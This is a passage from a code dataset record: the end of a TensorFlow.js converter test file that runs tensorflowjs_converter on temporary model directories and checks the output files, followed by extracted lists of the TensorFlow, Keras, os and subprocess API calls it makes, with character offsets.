'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'tfjs_graph_model',
os.path.join(layers_model_output_dir, 'model.json'), graph_model_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 4. Check the model.json and weight file and its size.
self.assertTrue(os.path.isfile(os.path.join(graph_model_dir, 'model.json')))
weight_files = sorted(
glob.glob(os.path.join(graph_model_dir, 'group*.bin')))
self.assertEqual(len(weight_files), 1)
if __name__ == '__main__':
tf.test.main()
| [
"tensorflow.python.eager.def_function.function",
"tensorflow.keras.layers.Dense",
"tensorflow.keras.models.load_model",
"tensorflow.keras.experimental.export_saved_model",
"tensorflow.compat.as_bytes",
"tensorflow.python.ops.variables.Variable",
"tensorflow.compat.v1.Session",
"tensorflow.compat.v1.global_variables_initializer",
"tensorflow.compat.v1.placeholder",
"tensorflow.keras.layers.Input",
"tensorflow.Graph",
"tensorflow.compat.v1.saved_model.builder.SavedModelBuilder",
"tensorflow.keras.layers.Reshape",
"tensorflow.keras.Sequential",
"tensorflow_hub.create_module_spec",
"tensorflow.python.training.tracking.tracking.AutoTrackable",
"tensorflow.python.saved_model.save.save",
"subprocess.Popen",
"tensorflow.compat.v1.saved_model.signature_def_utils.predict_signature_def",
"os.path.isdir",
"tensorflow.keras.models.Model",
"tensorflow.compat.v1.nn.softmax",
"os.path.getsize",
"tensorflow_hub.Module",
"tensorflow.Variable",
"numpy.size",
"tensorflowjs.converters.save_keras_model",
"os.path.isfile",
"tensorflow.keras.layers.LSTM",
"os.path.dirname",
"tempfile.mkdtemp",
"tensorflow.compat.v1.constant",
"tensorflow.keras.Input",
"numpy.random.randn",
"tensorflow.compat.v1.name_scope",
"tensorflow.compat.v1.matmul",
"tensorflow.compat.v1.get_variable",
"tensorflow.keras.layers.Concatenate",
"os.path.join",
"tensorflow.python.framework.constant_op.constant",
"tensorflowjs.__version__.count",
"tensorflow.test.main",
"json.load",
"shutil.rmtree",
"tensorflow.keras.Model",
"tensorflow_hub.add_signature"
] | [((1826, 1850), 'tensorflow.keras.layers.Input', 'keras.layers.Input', (['(3,)'], {}), '((3,))\n', (1844, 1850), False, 'from tensorflow import keras\n'), ((2177, 2236), 'tensorflow.keras.models.Model', 'keras.models.Model', ([], {'inputs': '[input_tensor]', 'outputs': '[output]'}), '(inputs=[input_tensor], outputs=[output])\n', (2195, 2236), False, 'from tensorflow import keras\n'), ((2622, 2632), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (2630, 2632), True, 'import tensorflow as tf\n'), ((3916, 3952), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(1.0)'], {'shape': '[1]'}), '(1.0, shape=[1])\n', (3936, 3952), False, 'from tensorflow.python.framework import constant_op\n'), ((3961, 3985), 'tensorflow.python.training.tracking.tracking.AutoTrackable', 'tracking.AutoTrackable', ([], {}), '()\n', (3983, 3985), False, 'from tensorflow.python.training.tracking import tracking\n'), ((3998, 4021), 'tensorflow.python.ops.variables.Variable', 'variables.Variable', (['(3.0)'], {}), '(3.0)\n', (4016, 4021), False, 'from tensorflow.python.ops import variables\n'), ((4033, 4056), 'tensorflow.python.ops.variables.Variable', 'variables.Variable', (['(2.0)'], {}), '(2.0)\n', (4051, 4056), False, 'from tensorflow.python.ops import variables\n'), ((4067, 4121), 'tensorflow.python.eager.def_function.function', 'def_function.function', (['(lambda x: root.v1 * root.v2 * x)'], {}), '(lambda x: root.v1 * root.v2 * x)\n', (4088, 4121), False, 'from tensorflow.python.eager import def_function\n'), ((4178, 4208), 'tensorflow.python.saved_model.save.save', 'save', (['root', 'save_path', 'to_save'], {}), '(root, save_path, to_save)\n', (4182, 4208), False, 'from tensorflow.python.saved_model.save import save\n'), ((4580, 4590), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (4588, 4590), True, 'import tensorflow as tf\n'), ((33845, 33859), 'tensorflow.test.main', 'tf.test.main', ([], {}), '()\n', (33857, 33859), True, 'import tensorflow as tf\n'), ((1863, 1986), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(4)'], {'use_bias': '(True)', 'kernel_initializer': '"""ones"""', 'bias_initializer': '"""zeros"""', 'name': "(layer_name_prefix + '1')"}), "(4, use_bias=True, kernel_initializer='ones',\n bias_initializer='zeros', name=layer_name_prefix + '1')\n", (1881, 1986), False, 'from tensorflow import keras\n'), ((2039, 2138), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(2)'], {'use_bias': '(False)', 'kernel_initializer': '"""ones"""', 'name': "(layer_name_prefix + '2')"}), "(2, use_bias=False, kernel_initializer='ones', name=\n layer_name_prefix + '2')\n", (2057, 2138), False, 'from tensorflow import keras\n'), ((4450, 4473), 'tensorflow.Variable', 'tf.Variable', (['[2.0, 4.0]'], {}), '([2.0, 4.0])\n', (4461, 4473), True, 'import tensorflow as tf\n'), ((4482, 4524), 'tensorflow.compat.v1.placeholder', 'tf.compat.v1.placeholder', ([], {'dtype': 'tf.float32'}), '(dtype=tf.float32)\n', (4506, 4524), True, 'import tensorflow as tf\n'), ((4529, 4571), 'tensorflow_hub.add_signature', 'hub.add_signature', ([], {'inputs': 'x', 'outputs': '(x * w)'}), '(inputs=x, outputs=x * w)\n', (4546, 4571), True, 'import tensorflow_hub as hub\n'), ((4629, 4669), 'tensorflow_hub.create_module_spec', 'hub.create_module_spec', (['double_module_fn'], {}), '(double_module_fn)\n', (4651, 4669), True, 'import tensorflow_hub as hub\n'), ((4678, 4694), 'tensorflow_hub.Module', 'hub.Module', (['spec'], {}), '(spec)\n', (4688, 4694), True, 'import tensorflow_hub as hub\n'), ((4725, 4758), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {'graph': 'graph'}), '(graph=graph)\n', (4745, 4758), True, 'import tensorflow as tf\n'), ((5014, 5032), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (5030, 5032), False, 'import tempfile\n'), ((5062, 5111), 'os.path.join', 'os.path.join', (['cls.class_tmp_dir', '"""tf_saved_model"""'], {}), "(cls.class_tmp_dir, 'tf_saved_model')\n", (5074, 5111), False, 'import os\n'), ((5144, 5196), 'os.path.join', 'os.path.join', (['cls.class_tmp_dir', '"""tf_saved_model_v1"""'], {}), "(cls.class_tmp_dir, 'tf_saved_model_v1')\n", (5156, 5196), False, 'import os\n'), ((5369, 5417), 'os.path.join', 'os.path.join', (['cls.class_tmp_dir', '"""tf_hub_module"""'], {}), "(cls.class_tmp_dir, 'tf_hub_module')\n", (5381, 5417), False, 'import os\n'), ((5510, 5542), 'shutil.rmtree', 'shutil.rmtree', (['cls.class_tmp_dir'], {}), '(cls.class_tmp_dir)\n', (5523, 5542), False, 'import shutil\n'), ((5923, 5941), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (5939, 5941), False, 'import tempfile\n'), ((6013, 6041), 'os.path.isdir', 'os.path.isdir', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (6026, 6041), False, 'import os\n'), ((9021, 9192), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'nonsensical_format', self.\n _tmp_dir, self._tmp_dir]"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['tensorflowjs_converter', '--input_format',\n 'nonsensical_format', self._tmp_dir, self._tmp_dir], stdout=subprocess.\n PIPE, stderr=subprocess.PIPE)\n", (9037, 9192), False, 'import subprocess\n'), ((9452, 9549), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter']"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['tensorflowjs_converter'], stdout=subprocess.PIPE, stderr\n =subprocess.PIPE)\n", (9468, 9549), False, 'import subprocess\n'), ((15253, 15280), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (15265, 15280), False, 'import os\n'), ((15295, 15463), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tf_saved_model',\n '--output_format', 'tfjs_graph_model', self.tf_saved_model_v1_dir,\n output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.\n tf_saved_model_v1_dir, output_dir])\n", (15311, 15463), False, 'import subprocess\n'), ((16083, 16110), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (16095, 16110), False, 'import os\n'), ((16125, 16237), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tf_hub', self.\n tf_hub_module_dir, output_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'tf_hub',\n self.tf_hub_module_dir, output_dir])\n", (16141, 16237), False, 'import subprocess\n'), ((16915, 16942), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (16927, 16942), False, 'import os\n'), ((16957, 17122), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tf_saved_model',\n '--output_format', 'tfjs_graph_model', self.tf_saved_model_dir, output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.\n tf_saved_model_dir, output_dir])\n", (16973, 17122), False, 'import subprocess\n'), ((18336, 18363), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (18348, 18363), False, 'import os\n'), ((18378, 18490), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tf_hub', self.\n tf_hub_module_dir, output_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'tf_hub',\n self.tf_hub_module_dir, output_dir])\n", (18394, 18490), False, 'import subprocess\n'), ((19283, 19334), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""', '"""model.h5"""'], {}), "(self._tmp_dir, 'keras_h5', 'model.h5')\n", (19295, 19334), False, 'import os\n'), ((19560, 19659), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, self._tmp_dir])\n", (19576, 19659), False, 'import subprocess\n'), ((19825, 19866), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model_2.h5"""'], {}), "(self._tmp_dir, 'model_2.h5')\n", (19837, 19866), False, 'import os\n'), ((20632, 20683), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""', '"""model.h5"""'], {}), "(self._tmp_dir, 'keras_h5', 'model.h5')\n", (20644, 20683), False, 'import os\n'), ((20909, 21008), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, self._tmp_dir])\n", (20925, 21008), False, 'import subprocess\n'), ((21455, 21565), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--version']"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['tensorflowjs_converter', '--version'], stdout=subprocess\n .PIPE, stderr=subprocess.PIPE)\n", (21471, 21565), False, 'import subprocess\n'), ((21804, 21906), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '-v']"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['tensorflowjs_converter', '-v'], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n", (21820, 21906), False, 'import subprocess\n'), ((22281, 22299), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (22297, 22299), False, 'import tempfile\n'), ((22330, 22358), 'os.path.isdir', 'os.path.isdir', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (22343, 22358), False, 'import os\n'), ((22507, 22525), 'tensorflow.keras.Sequential', 'keras.Sequential', ([], {}), '()\n', (22523, 22525), False, 'from tensorflow import keras\n'), ((22755, 22773), 'tensorflow.keras.Sequential', 'keras.Sequential', ([], {}), '()\n', (22771, 22773), False, 'from tensorflow import keras\n'), ((22977, 22999), 'tensorflow.keras.Input', 'keras.Input', ([], {'shape': '[8]'}), '(shape=[8])\n', (22988, 22999), False, 'from tensorflow import keras\n'), ((23013, 23036), 'tensorflow.keras.Input', 'keras.Input', ([], {'shape': '[10]'}), '(shape=[10])\n', (23024, 23036), False, 'from tensorflow import keras\n'), ((23157, 23189), 'tensorflow.keras.Model', 'keras.Model', (['[input1, input2]', 'y'], {}), '([input1, input2], y)\n', (23168, 23189), False, 'from tensorflow import keras\n'), ((32381, 32403), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\n', (32396, 32403), True, 'import numpy as np\n'), ((32454, 32472), 'tensorflow.keras.Sequential', 'keras.Sequential', ([], {}), '()\n', (32470, 32472), False, 'from tensorflow import keras\n'), ((32621, 32660), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.h5"""'], {}), "(self._tmp_dir, 'model.h5')\n", (32633, 32660), False, 'import os\n'), ((32784, 32826), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs_layers"""'], {}), "(self._tmp_dir, 'tfjs_layers')\n", (32796, 32826), False, 'import os\n'), ((32900, 33009), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras', h5_path,\n layers_model_output_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, layers_model_output_dir])\n", (32916, 33009), False, 'import subprocess\n'), ((33189, 33230), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs_graph"""'], {}), "(self._tmp_dir, 'tfjs_graph')\n", (33201, 33230), False, 'import os\n'), ((2669, 2704), 'tensorflow.compat.v1.name_scope', 'tf.compat.v1.name_scope', (['name_scope'], {}), '(name_scope)\n', (2692, 2704), True, 'import tensorflow as tf\n'), ((2716, 2766), 'tensorflow.compat.v1.constant', 'tf.compat.v1.constant', (['[[37.0, -23.0], [1.0, 4.0]]'], {}), '([[37.0, -23.0], [1.0, 4.0]])\n', (2737, 2766), True, 'import tensorflow as tf\n'), ((2777, 2821), 'tensorflow.compat.v1.get_variable', 'tf.compat.v1.get_variable', (['"""w"""'], {'shape': '[2, 2]'}), "('w', shape=[2, 2])\n", (2802, 2821), True, 'import tensorflow as tf\n'), ((2832, 2857), 'tensorflow.compat.v1.matmul', 'tf.compat.v1.matmul', (['x', 'w'], {}), '(x, w)\n', (2851, 2857), True, 'import tensorflow as tf\n'), ((2873, 2899), 'tensorflow.compat.v1.nn.softmax', 'tf.compat.v1.nn.softmax', (['y'], {}), '(y)\n', (2896, 2899), True, 'import tensorflow as tf\n'), ((2973, 3034), 'tensorflow.compat.v1.saved_model.builder.SavedModelBuilder', 'tf.compat.v1.saved_model.builder.SavedModelBuilder', (['save_path'], {}), '(save_path)\n', (3023, 3034), True, 'import tensorflow as tf\n'), ((4781, 4824), 'tensorflow.compat.v1.global_variables_initializer', 'tf.compat.v1.global_variables_initializer', ([], {}), '()\n', (4822, 4824), True, 'import tensorflow as tf\n'), ((6049, 6077), 'shutil.rmtree', 'shutil.rmtree', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (6062, 6077), False, 'import shutil\n'), ((6178, 6205), 'tensorflowjs.__version__.count', 'tfjs.__version__.count', (['"""."""'], {}), "('.')\n", (6200, 6205), True, 'import tensorflowjs as tfjs\n'), ((6364, 6418), 'tensorflowjs.converters.save_keras_model', 'tfjs.converters.save_keras_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (6396, 6418), True, 'import tensorflowjs as tfjs\n'), ((8039, 8061), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (8059, 8061), True, 'import tensorflow as tf\n'), ((8157, 8212), 'tensorflowjs.converters.save_keras_model', 'tfjs.converters.save_keras_model', (['model1', 'self._tmp_dir'], {}), '(model1, self._tmp_dir)\n', (8189, 8212), True, 'import tensorflowjs as tfjs\n'), ((8298, 8320), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (8318, 8320), True, 'import tensorflow as tf\n'), ((9364, 9390), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\n', (9382, 9390), True, 'import tensorflow as tf\n'), ((9709, 9735), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\n', (9727, 9735), True, 'import tensorflow as tf\n'), ((9819, 9841), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (9839, 9841), True, 'import tensorflow as tf\n'), ((9958, 10009), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""', '"""model.h5"""'], {}), "(self._tmp_dir, 'keras_h5', 'model.h5')\n", (9970, 10009), False, 'import os\n'), ((10081, 10180), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, self._tmp_dir])\n", (10097, 10180), False, 'import subprocess\n'), ((12252, 12274), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (12272, 12274), True, 'import tensorflow as tf\n'), ((12391, 12442), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""', '"""model.h5"""'], {}), "(self._tmp_dir, 'keras_h5', 'model.h5')\n", (12403, 12442), False, 'import os\n'), ((12514, 12641), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras',\n '--split_weights_by_layer', h5_path, self._tmp_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n '--split_weights_by_layer', h5_path, self._tmp_dir])\n", (12530, 12641), False, 'import subprocess\n'), ((15148, 15174), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\n', (15166, 15174), True, 'import tensorflow as tf\n'), ((19228, 19267), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""'], {}), "(self._tmp_dir, 'keras_h5')\n", (19240, 19267), False, 'import os\n'), ((19369, 19391), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (19389, 19391), True, 'import tensorflow as tf\n'), ((20277, 20299), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (20297, 20299), True, 'import tensorflow as tf\n'), ((20317, 20353), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\n', (20340, 20353), False, 'from tensorflow import keras\n'), ((20577, 20616), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""'], {}), "(self._tmp_dir, 'keras_h5')\n", (20589, 20616), False, 'import os\n'), ((20718, 20740), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (20738, 20740), True, 'import tensorflow as tf\n'), ((21200, 21222), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (21220, 21222), True, 'import tensorflow as tf\n'), ((21695, 21751), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (["('tensorflowjs %s' % tfjs.__version__)"], {}), "('tensorflowjs %s' % tfjs.__version__)\n", (21713, 21751), True, 'import tensorflow as tf\n'), ((21761, 21787), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stdout'], {}), '(stdout)\n', (21779, 21787), True, 'import tensorflow as tf\n'), ((22037, 22093), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (["('tensorflowjs %s' % tfjs.__version__)"], {}), "('tensorflowjs %s' % tfjs.__version__)\n", (22055, 22093), True, 'import tensorflow as tf\n'), ((22103, 22129), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stdout'], {}), '(stdout)\n', (22121, 22129), True, 'import tensorflow as tf\n'), ((22366, 22394), 'shutil.rmtree', 'shutil.rmtree', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (22379, 22394), False, 'import shutil\n'), ((22540, 22585), 'tensorflow.keras.layers.Reshape', 'keras.layers.Reshape', (['[2, 3]'], {'input_shape': '[6]'}), '([2, 3], input_shape=[6])\n', (22560, 22585), False, 'from tensorflow import keras\n'), ((22601, 22622), 'tensorflow.keras.layers.LSTM', 'keras.layers.LSTM', (['(10)'], {}), '(10)\n', (22618, 22622), False, 'from tensorflow import keras\n'), ((22638, 22681), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(1)'], {'activation': '"""sigmoid"""'}), "(1, activation='sigmoid')\n", (22656, 22681), False, 'from tensorflow import keras\n'), ((22788, 22846), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(6)'], {'input_shape': '[10]', 'activation': '"""relu"""'}), "(6, input_shape=[10], activation='relu')\n", (22806, 22846), False, 'from tensorflow import keras\n'), ((23045, 23071), 'tensorflow.keras.layers.Concatenate', 'keras.layers.Concatenate', ([], {}), '()\n', (23069, 23071), False, 'from tensorflow import keras\n'), ((23098, 23141), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(4)'], {'activation': '"""softmax"""'}), "(4, activation='softmax')\n", (23116, 23141), False, 'from tensorflow import keras\n'), ((23314, 23336), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (23334, 23336), True, 'import tensorflow as tf\n'), ((23348, 23370), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\n', (23363, 23370), True, 'import numpy as np\n'), ((23559, 23618), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (23596, 23618), False, 'from tensorflow import keras\n'), ((23701, 23736), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs"""'], {}), "(self._tmp_dir, 'tfjs')\n", (23713, 23736), False, 'import os\n'), ((23814, 23933), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\n _tmp_dir, tfjs_output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])\n", (23830, 23933), False, 'import subprocess\n'), ((24057, 24100), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '"""model.json"""'], {}), "(tfjs_output_dir, 'model.json')\n", (24069, 24100), False, 'import os\n'), ((24231, 24271), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""new_h5.h5"""'], {}), "(self._tmp_dir, 'new_h5.h5')\n", (24243, 24271), False, 'import os\n'), ((24288, 24437), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'keras', model_json_path, new_h5_path]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'tfjs_layers_model', '--output_format', 'keras', model_json_path,\n new_h5_path])\n", (24304, 24437), False, 'import subprocess\n'), ((24691, 24727), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\n', (24714, 24727), False, 'from tensorflow import keras\n'), ((24902, 24924), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (24922, 24924), True, 'import tensorflow as tf\n'), ((24937, 24958), 'numpy.random.randn', 'np.random.randn', (['(4)', '(8)'], {}), '(4, 8)\n', (24952, 24958), True, 'import numpy as np\n'), ((24970, 24992), 'numpy.random.randn', 'np.random.randn', (['(4)', '(10)'], {}), '(4, 10)\n', (24985, 24992), True, 'import numpy as np\n'), ((25193, 25252), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (25230, 25252), False, 'from tensorflow import keras\n'), ((25335, 25370), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs"""'], {}), "(self._tmp_dir, 'tfjs')\n", (25347, 25370), False, 'import os\n'), ((25449, 25613), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras_saved_model',\n '--output_format', 'tfjs_layers_model', self._tmp_dir, tfjs_output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', '--output_format', 'tfjs_layers_model', self.\n _tmp_dir, tfjs_output_dir])\n", (25465, 25613), False, 'import subprocess\n'), ((25742, 25785), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '"""model.json"""'], {}), "(tfjs_output_dir, 'model.json')\n", (25754, 25785), False, 'import os\n'), ((25916, 25956), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""new_h5.h5"""'], {}), "(self._tmp_dir, 'new_h5.h5')\n", (25928, 25956), False, 'import os\n'), ((25973, 26122), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'keras', model_json_path, new_h5_path]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'tfjs_layers_model', '--output_format', 'keras', model_json_path,\n new_h5_path])\n", (25989, 26122), False, 'import subprocess\n'), ((26376, 26412), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\n', (26399, 26412), False, 'from tensorflow import keras\n'), ((26586, 26608), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (26606, 26608), True, 'import tensorflow as tf\n'), ((26620, 26642), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\n', (26635, 26642), True, 'import numpy as np\n'), ((26831, 26890), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (26868, 26890), False, 'from tensorflow import keras\n'), ((26973, 27008), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs"""'], {}), "(self._tmp_dir, 'tfjs')\n", (26985, 27008), False, 'import os\n'), ((27075, 27236), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras', self._tmp_dir,\n tfjs_output_dir]"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['tensorflowjs_converter', '--input_format', 'keras', self\n ._tmp_dir, tfjs_output_dir], stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n", (27091, 27236), False, 'import subprocess\n'), ((27573, 27595), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (27593, 27595), True, 'import tensorflow as tf\n'), ((27607, 27629), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\n', (27622, 27629), True, 'import numpy as np\n'), ((27919, 27978), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (27956, 27978), False, 'from tensorflow import keras\n'), ((28074, 28109), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs"""'], {}), "(self._tmp_dir, 'tfjs')\n", (28086, 28109), False, 'import os\n'), ((28187, 28306), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\n _tmp_dir, tfjs_output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])\n", (28203, 28306), False, 'import subprocess\n'), ((28674, 28717), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs_sharded"""'], {}), "(self._tmp_dir, 'tfjs_sharded')\n", (28686, 28717), False, 'import os\n'), ((29738, 29778), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""new_h5.h5"""'], {}), "(self._tmp_dir, 'new_h5.h5')\n", (29750, 29778), False, 'import os\n'), ((30076, 30098), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (30096, 30098), True, 'import tensorflow as tf\n'), ((30212, 30248), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\n', (30235, 30248), False, 'from tensorflow import keras\n'), ((30411, 30433), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (30431, 30433), True, 'import tensorflow as tf\n'), ((30445, 30467), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\n', (30460, 30467), True, 'import numpy as np\n'), ((30757, 30816), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (30794, 30816), False, 'from tensorflow import keras\n'), ((30912, 30947), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs"""'], {}), "(self._tmp_dir, 'tfjs')\n", (30924, 30947), False, 'import os\n'), ((31025, 31144), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\n _tmp_dir, tfjs_output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])\n", (31041, 31144), False, 'import subprocess\n'), ((31516, 31559), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs_sharded"""'], {}), "(self._tmp_dir, 'tfjs_sharded')\n", (31528, 31559), False, 'import os\n'), ((32140, 32172), 'os.path.getsize', 'os.path.getsize', (['weight_files[0]'], {}), '(weight_files[0])\n', (32155, 32172), False, 'import os\n'), ((32487, 32545), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(10)'], {'activation': '"""relu"""', 'input_shape': '[4]'}), "(10, activation='relu', input_shape=[4])\n", (32505, 32545), False, 